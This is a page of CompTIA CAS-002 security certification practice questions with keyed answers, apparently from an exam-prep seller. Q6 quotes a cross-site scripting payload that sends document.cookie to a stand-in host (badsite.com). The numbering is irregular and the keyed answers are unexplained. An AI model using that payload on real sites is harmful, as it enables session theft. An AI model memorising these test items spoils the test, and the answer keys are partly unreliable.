Proper study guides for Regenerate CompTIA CompTIA Advanced Security Practitioner (CASP) certified begins with CompTIA CAS-002 preparation products which designed to deliver the Validated CAS-002 questions by making you pass the CAS-002 test at your first time. Try the free CAS-002 demo right now.
2021 Dec CAS-002 practice
Q1. - (Topic 1)
The risk manager has requested a security solution that is centrally managed, can easily be updated, and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement?
A. HIPS
B. UTM
C. Antivirus
D. NIPS
E. DLP
Answer: A
Q2. - (Topic 1)
Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete?
A. They should logon to the system using the username concatenated with the 6-digit code and their original password.
B. They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code.
C. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed.
D. They should use the username format: first.lastname@company.com, together with a password and their 6-digit code.
Answer: D
Q3. - (Topic 5)
A security administrator is investigating the compromise of a software distribution website. Forensic analysis shows that several popular files are infected with malicious code. However, comparing a hash of the infected files with the original, non-infected files which were restored from backup, shows that the hash is the same. Which of the following explains this?
A. The infected files were using obfuscation techniques to evade detection by antivirus software.
B. The infected files were specially crafted to exploit a collision in the hash function.
C. The infected files were using heuristic techniques to evade detection by antivirus software.
D. The infected files were specially crafted to exploit diffusion in the hash function.
Answer: B
491. - (Topic 5)
The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary?
A. The corporate network is the only network that is audited by regulators and customers.
B. The aggregation of employees on a corporate network makes it a more valuable target for attackers.
C. Home networks are unknown to attackers and less likely to be targeted directly.
D. Employees are more likely to be using personal computers for general web browsing when they are at home.
Answer: B
Q4. - (Topic 4)
Which of the following activities is commonly deemed “OUT OF SCOPE” when undertaking a penetration test?
A. Test password complexity of all login fields and input validation of form fields
B. Reverse engineering any thick client software that has been provided for the test
C. Undertaking network-based denial of service attacks in production environment
D. Attempting to perform blind SQL injection and reflected cross-site scripting attacks
E. Running a vulnerability scanning tool to assess network and host weaknesses
Answer: C
Q5. - (Topic 2)
A security architect has been engaged during the implementation stage of the SDLC to review a new HR software installation for security gaps. With the project under a tight schedule to meet market commitments on project delivery, which of the following security activities should be prioritized by the security architect? (Select TWO).
A. Perform penetration testing over the HR solution to identify technical vulnerabilities
B. Perform a security risk assessment with recommended solutions to close off high-rated risks
C. Secure code review of the HR solution to identify security gaps that could be exploited
D. Perform access control testing to ensure that privileges have been configured correctly
E. Determine if the information security standards have been complied with by the project
Answer: B,E
Improve CAS-002 question:
Q6. - (Topic 1)
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cooki e</script>') + "'
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
Answer: A
Q7. - (Topic 1)
A company has issued a new mobile device policy permitting BYOD and company-issued devices. The company-issued device has a managed middleware client that restricts the applications allowed on company devices and provides those that are approved. The middleware client provides configuration standardization for both company owned and BYOD to secure data and communication to the device according to industry best practices. The policy states that, “BYOD clients must meet the company’s infrastructure requirements to permit a connection.” The company also issues a memorandum separate from the policy, which provides instructions for the purchase, installation, and use of the middleware client on BYOD. Which of the following is being described?
A. Asset management
B. IT governance
C. Change management
D. Transference of risk
Answer: B
Q8. - (Topic 4)
The Chief Information Security Officer (CISO) at a software development company is concerned about the lack of introspection during a testing cycle of the company’s flagship product. Testing was conducted by a small offshore consulting firm and the report by the consulting firm clearly indicates that limited test cases were used and many of the code paths remained untested.
The CISO raised concerns about the testing results at the monthly risk committee meeting, highlighting the need to get to the bottom of the product behaving unexpectedly in only some large enterprise deployments.
The Security Assurance and Development teams highlighted their availability to redo the testing if required.
Which of the following will provide the MOST thorough testing?
A. Have the small consulting firm redo the Black box testing.
B. Use the internal teams to perform Grey box testing.
C. Use the internal team to perform Black box testing.
D. Use the internal teams to perform White box testing.
E. Use a larger consulting firm to perform Black box testing.
Answer: D
Q9. - (Topic 1)
An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Data sovereignty and privacy concerns raised by the security team resulted in the third-party provider only accessing and processing the data via remote desktop sessions. To facilitate communications and improve productivity, staff at the third party has been provided with corporate email accounts that are only accessible via the remote desktop sessions. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization. Which of the following additional controls should be implemented to prevent data loss? (Select THREE).
A. Implement hashing of data in transit
B. Session recording and capture
C. Disable cross session cut and paste
D. Monitor approved credit accounts
E. User access audit reviews
F. Source IP whitelisting
Answer: C,E,F
Q10. - (Topic 3)
The <nameID> element in SAML can be provided in which of the following predefined formats? (Select TWO).
A. X.509 subject name
B. PTR DNS record
C. EV certificate OID extension
D. Kerberos principal name
E. WWN record name
Answer: A,D